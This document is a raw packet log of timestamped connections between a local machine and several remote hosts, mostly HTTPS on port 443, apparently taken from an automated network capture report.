                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.551151991 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.551211119 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.551217079 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.551310062 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.553985119 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.554045916 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.554055929 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.554091930 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.557265997 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.557323933 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.557329893 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.557426929 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.561012983 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.561079025 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.561084986 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.561997890 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.563895941 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.563962936 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.563973904 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.564480066 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.566725969 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.566788912 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.566795111 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.567404032 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.570461988 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.570534945 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.570544958 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.570594072 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.573331118 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.573398113 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.573405027 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.574136972 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.639254093 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.639348030 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.639383078 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.639403105 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.639414072 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.639421940 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.639450073 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.639475107 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.639496088 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.639527082 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.646737099 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.709768057 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.709842920 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.709860086 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.709995985 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.712161064 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.712215900 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.712222099 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.712280035 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.716526985 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.716603041 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.716609001 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.716649055 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.719206095 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.176636934 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.176651955 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.176671028 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.176706076 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.176721096 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.190654039 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.190696955 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.190725088 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.190754890 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.190769911 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.190872908 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.205327988 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.205399990 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.205400944 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.205431938 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.205450058 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.205471992 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.219458103 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.219521046 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.219532013 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.219548941 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.219574928 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.219594955 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.232018948 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.232074976 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.232100964 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.232116938 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.232148886 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.232163906 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.247371912 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.247426033 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.247451067 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.247477055 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.247500896 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.247515917 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.259849072 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.259871960 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.259927988 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.259953976 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.259982109 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.260003090 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.367609978 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.367649078 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.367685080 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.367707014 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.367734909 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.367743969 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.379143000 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.379173994 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.379225969 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.379234076 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.379271030 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.379285097 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.389830112 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.389859915 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.389897108 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.389904976 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.389946938 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.398773909 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.398797035 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.398850918 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.398859978 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.398880005 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.398895025 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.409809113 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.409831047 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.409872055 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.409882069 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.409924984 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.409986019 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.418673038 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.418699026 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.418734074 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.418765068 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.418796062 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.418817043 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.429366112 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.429389000 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.429438114 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.429449081 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.429472923 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.429543018 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.442768097 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.442792892 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.442837954 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.442846060 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.442867994 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.442890882 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.560010910 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.560043097 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.560081959 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.560117006 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.560132027 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.560348034 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.569874048 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.569900990 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.569972038 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.570000887 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.570039988 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.578514099 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:10.673367023 CET4434992620.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:10.673443079 CET49926443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:10.675228119 CET49926443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:10.675245047 CET4434992620.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:10.675538063 CET4434992620.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:10.677862883 CET49926443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:10.677917957 CET49926443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:10.677925110 CET4434992620.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:10.678071022 CET49926443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:10.723325968 CET4434992620.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:11.342211962 CET4434992620.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:11.342384100 CET4434992620.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:11.342443943 CET49926443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:11.342586040 CET49926443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:11.342601061 CET4434992620.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.612967014 CET49782443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.612998962 CET44349782172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.614739895 CET49784443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.614763021 CET44349784172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.616296053 CET49785443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.616316080 CET44349785172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.617532969 CET49783443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.617563009 CET44349783172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:16.083982944 CET49943443192.168.2.623.44.203.84
                                                                                                                                                                                                                  Dec 18, 2024 21:07:16.084026098 CET4434994323.44.203.84192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:16.088143110 CET49943443192.168.2.623.44.203.84
                                                                                                                                                                                                                  Dec 18, 2024 21:07:16.088252068 CET49943443192.168.2.623.44.203.84
                                                                                                                                                                                                                  Dec 18, 2024 21:07:16.088260889 CET4434994323.44.203.84192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:17.303033113 CET4434994323.44.203.84192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:17.310256958 CET49943443192.168.2.623.44.203.84
                                                                                                                                                                                                                  Dec 18, 2024 21:07:17.310272932 CET4434994323.44.203.84192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:17.314815044 CET4434994323.44.203.84192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:17.315064907 CET49943443192.168.2.623.44.203.84
                                                                                                                                                                                                                  Dec 18, 2024 21:07:17.323405027 CET49943443192.168.2.623.44.203.84
                                                                                                                                                                                                                  Dec 18, 2024 21:07:17.323611021 CET4434994323.44.203.84192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:17.371974945 CET49943443192.168.2.623.44.203.84
                                                                                                                                                                                                                  Dec 18, 2024 21:07:17.371987104 CET4434994323.44.203.84192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:17.576076984 CET49943443192.168.2.623.44.203.84
                                                                                                                                                                                                                  Dec 18, 2024 21:07:32.195250034 CET49982443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:32.195259094 CET4434998220.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:32.198769093 CET49982443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:32.199246883 CET49982443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:32.199255943 CET4434998220.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:33.260577917 CET4970480192.168.2.62.20.68.210
                                                                                                                                                                                                                  Dec 18, 2024 21:07:33.380846024 CET80497042.20.68.210192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:33.380898952 CET4970480192.168.2.62.20.68.210
                                                                                                                                                                                                                  Dec 18, 2024 21:07:34.414755106 CET4434998220.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:34.414896011 CET49982443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:34.420002937 CET49982443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:34.420011044 CET4434998220.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:34.420810938 CET4434998220.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:34.422173977 CET49982443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:34.422334909 CET49982443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:34.422342062 CET4434998220.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:34.422369957 CET49982443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:34.463360071 CET4434998220.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:35.086237907 CET4434998220.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:35.086745977 CET49982443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:35.086774111 CET4434998220.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:35.086815119 CET49982443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:35.086853981 CET49982443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:36.626307011 CET4434994323.44.203.84192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:36.626388073 CET4434994323.44.203.84192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:36.626430035 CET49943443192.168.2.623.44.203.84
                                                                                                                                                                                                                  Dec 18, 2024 21:07:59.474558115 CET50044443192.168.2.620.198.119.143
                                                                                                                                                                                                                  Dec 18, 2024 21:07:59.474617004 CET4435004420.198.119.143192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:59.474690914 CET50044443192.168.2.620.198.119.143
                                                                                                                                                                                                                  Dec 18, 2024 21:07:59.475446939 CET50044443192.168.2.620.198.119.143
                                                                                                                                                                                                                  Dec 18, 2024 21:07:59.475461960 CET4435004420.198.119.143192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:08:01.688153028 CET4435004420.198.119.143192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:08:01.688343048 CET50044443192.168.2.620.198.119.143
                                                                                                                                                                                                                  Dec 18, 2024 21:08:01.690123081 CET50044443192.168.2.620.198.119.143
                                                                                                                                                                                                                  Dec 18, 2024 21:08:01.690136909 CET4435004420.198.119.143192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:08:01.690390110 CET4435004420.198.119.143192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:08:01.771070957 CET50044443192.168.2.620.198.119.143
                                                                                                                                                                                                                  Dec 18, 2024 21:08:01.771955967 CET50044443192.168.2.620.198.119.143
                                                                                                                                                                                                                  Dec 18, 2024 21:08:01.771972895 CET4435004420.198.119.143192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:08:01.778368950 CET50044443192.168.2.620.198.119.143
                                                                                                                                                                                                                  Dec 18, 2024 21:08:01.819331884 CET4435004420.198.119.143192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:08:02.435775042 CET4435004420.198.119.143192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:08:02.436247110 CET50044443192.168.2.620.198.119.143
                                                                                                                                                                                                                  Dec 18, 2024 21:08:02.436252117 CET4435004420.198.119.143192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:08:02.436270952 CET50044443192.168.2.620.198.119.143
                                                                                                                                                                                                                  Dec 18, 2024 21:08:02.436280012 CET4435004420.198.119.143192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:08:02.436289072 CET4435004420.198.119.143192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:08:02.436304092 CET50044443192.168.2.620.198.119.143
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.567783117 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.568403006 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.568440914 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.568891048 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.569039106 CET62535443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.570328951 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.574961901 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.575000048 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.576421022 CET62535443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.576936960 CET62535443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.577124119 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.591175079 CET62535443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.689888954 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.690109015 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.884522915 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.884555101 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.884584904 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.884722948 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.891628027 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.892294884 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.892303944 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.892333984 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.892363071 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.895380974 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.895492077 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.895818949 CET62535443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.895876884 CET62535443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.905230045 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.222347021 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.222372055 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.263333082 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.263467073 CET62535443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.899525881 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.899666071 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.214957952 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.217776060 CET44361829172.64.41.3192.168.2.6
